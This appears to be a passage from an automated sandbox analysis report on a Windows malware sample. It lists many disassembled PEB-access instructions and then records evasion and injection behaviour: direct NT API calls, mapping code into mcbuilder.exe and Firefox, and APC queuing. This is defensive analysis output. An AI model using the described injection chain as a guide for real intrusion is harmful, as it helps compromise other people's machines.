                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019349D0 mov eax, dword ptr fs:[00000030h]3_2_019349D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CA9D3 mov eax, dword ptr fs:[00000030h]3_2_019CA9D3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019969C0 mov eax, dword ptr fs:[00000030h]3_2_019969C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019329F9 mov eax, dword ptr fs:[00000030h]3_2_019329F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019329F9 mov eax, dword ptr fs:[00000030h]3_2_019329F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E9E0 mov eax, dword ptr fs:[00000030h]3_2_0198E9E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C912 mov eax, dword ptr fs:[00000030h]3_2_0198C912
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8918 mov eax, dword ptr fs:[00000030h]3_2_018F8918
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8918 mov eax, dword ptr fs:[00000030h]3_2_018F8918
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E908 mov eax, dword ptr fs:[00000030h]3_2_0197E908
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E908 mov eax, dword ptr fs:[00000030h]3_2_0197E908
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198892A mov eax, dword ptr fs:[00000030h]3_2_0198892A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0199892B mov eax, dword ptr fs:[00000030h]3_2_0199892B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4940 mov eax, dword ptr fs:[00000030h]3_2_019D4940
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01980946 mov eax, dword ptr fs:[00000030h]3_2_01980946
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A4978 mov eax, dword ptr fs:[00000030h]3_2_019A4978
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A4978 mov eax, dword ptr fs:[00000030h]3_2_019A4978
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C97C mov eax, dword ptr fs:[00000030h]3_2_0198C97C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01926962 mov eax, dword ptr fs:[00000030h]3_2_01926962
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01926962 mov eax, dword ptr fs:[00000030h]3_2_01926962
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01926962 mov eax, dword ptr fs:[00000030h]3_2_01926962
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E mov eax, dword ptr fs:[00000030h]3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E mov edx, dword ptr fs:[00000030h]3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E mov eax, dword ptr fs:[00000030h]3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C89D mov eax, dword ptr fs:[00000030h]3_2_0198C89D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900887 mov eax, dword ptr fs:[00000030h]3_2_01900887
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E8C0 mov eax, dword ptr fs:[00000030h]3_2_0192E8C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D08C0 mov eax, dword ptr fs:[00000030h]3_2_019D08C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C8F9 mov eax, dword ptr fs:[00000030h]3_2_0193C8F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C8F9 mov eax, dword ptr fs:[00000030h]3_2_0193C8F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CA8E4 mov eax, dword ptr fs:[00000030h]3_2_019CA8E4
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C810 mov eax, dword ptr fs:[00000030h]3_2_0198C810
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A483A mov eax, dword ptr fs:[00000030h]3_2_019A483A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A483A mov eax, dword ptr fs:[00000030h]3_2_019A483A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A830 mov eax, dword ptr fs:[00000030h]3_2_0193A830
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov ecx, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01930854 mov eax, dword ptr fs:[00000030h]3_2_01930854
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904859 mov eax, dword ptr fs:[00000030h]3_2_01904859
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904859 mov eax, dword ptr fs:[00000030h]3_2_01904859
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01912840 mov ecx, dword ptr fs:[00000030h]3_2_01912840
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996870 mov eax, dword ptr fs:[00000030h]3_2_01996870
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996870 mov eax, dword ptr fs:[00000030h]3_2_01996870
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E872 mov eax, dword ptr fs:[00000030h]3_2_0198E872
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E872 mov eax, dword ptr fs:[00000030h]3_2_0198E872
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B4BB0 mov eax, dword ptr fs:[00000030h]3_2_019B4BB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B4BB0 mov eax, dword ptr fs:[00000030h]3_2_019B4BB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910BBE mov eax, dword ptr fs:[00000030h]3_2_01910BBE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910BBE mov eax, dword ptr fs:[00000030h]3_2_01910BBE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AEBD0 mov eax, dword ptr fs:[00000030h]3_2_019AEBD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01920BCB mov eax, dword ptr fs:[00000030h]3_2_01920BCB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01920BCB mov eax, dword ptr fs:[00000030h]3_2_01920BCB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01920BCB mov eax, dword ptr fs:[00000030h]3_2_01920BCB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900BCD mov eax, dword ptr fs:[00000030h]3_2_01900BCD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900BCD mov eax, dword ptr fs:[00000030h]3_2_01900BCD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900BCD mov eax, dword ptr fs:[00000030h]3_2_01900BCD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908BF0 mov eax, dword ptr fs:[00000030h]3_2_01908BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908BF0 mov eax, dword ptr fs:[00000030h]3_2_01908BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908BF0 mov eax, dword ptr fs:[00000030h]3_2_01908BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198CBF0 mov eax, dword ptr fs:[00000030h]3_2_0198CBF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192EBFC mov eax, dword ptr fs:[00000030h]3_2_0192EBFC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4B00 mov eax, dword ptr fs:[00000030h]3_2_019D4B00
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192EB20 mov eax, dword ptr fs:[00000030h]3_2_0192EB20
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192EB20 mov eax, dword ptr fs:[00000030h]3_2_0192EB20
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C8B28 mov eax, dword ptr fs:[00000030h]3_2_019C8B28
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C8B28 mov eax, dword ptr fs:[00000030h]3_2_019C8B28
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AEB50 mov eax, dword ptr fs:[00000030h]3_2_019AEB50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D2B57 mov eax, dword ptr fs:[00000030h]3_2_019D2B57
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D2B57 mov eax, dword ptr fs:[00000030h]3_2_019D2B57
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D2B57 mov eax, dword ptr fs:[00000030h]3_2_019D2B57
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D2B57 mov eax, dword ptr fs:[00000030h]3_2_019D2B57
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B4B4B mov eax, dword ptr fs:[00000030h]3_2_019B4B4B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B4B4B mov eax, dword ptr fs:[00000030h]3_2_019B4B4B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A8B42 mov eax, dword ptr fs:[00000030h]3_2_019A8B42
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996B40 mov eax, dword ptr fs:[00000030h]3_2_01996B40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996B40 mov eax, dword ptr fs:[00000030h]3_2_01996B40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CAB40 mov eax, dword ptr fs:[00000030h]3_2_019CAB40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8B50 mov eax, dword ptr fs:[00000030h]3_2_018F8B50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FCB7E mov eax, dword ptr fs:[00000030h]3_2_018FCB7E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01938A90 mov edx, dword ptr fs:[00000030h]3_2_01938A90
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4A80 mov eax, dword ptr fs:[00000030h]3_2_019D4A80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908AA0 mov eax, dword ptr fs:[00000030h]3_2_01908AA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908AA0 mov eax, dword ptr fs:[00000030h]3_2_01908AA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01956AA4 mov eax, dword ptr fs:[00000030h]3_2_01956AA4
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900AD0 mov eax, dword ptr fs:[00000030h]3_2_01900AD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01934AD0 mov eax, dword ptr fs:[00000030h]3_2_01934AD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01956ACC mov eax, dword ptr fs:[00000030h]3_2_01956ACC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193AAEE mov eax, dword ptr fs:[00000030h]3_2_0193AAEE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198CA11 mov eax, dword ptr fs:[00000030h]3_2_0198CA11
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01924A35 mov eax, dword ptr fs:[00000030h]3_2_01924A35
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193CA24 mov eax, dword ptr fs:[00000030h]3_2_0193CA24
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192EA2E mov eax, dword ptr fs:[00000030h]3_2_0192EA2E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906A50 mov eax, dword ptr fs:[00000030h]3_2_01906A50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtClose: Direct from: 0x76F02B6C
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory written: C:\Users\user\Desktop\dGHiTqj3AB.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: NULL target: C:\Windows\SysWOW64\mcbuilder.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeThread register set: target process: 7288Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeThread APC queued: target process: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"Jump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeProcess created: C:\Windows\SysWOW64\mcbuilder.exe "C:\Windows\SysWOW64\mcbuilder.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Users\user\Desktop\dGHiTqj3AB.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
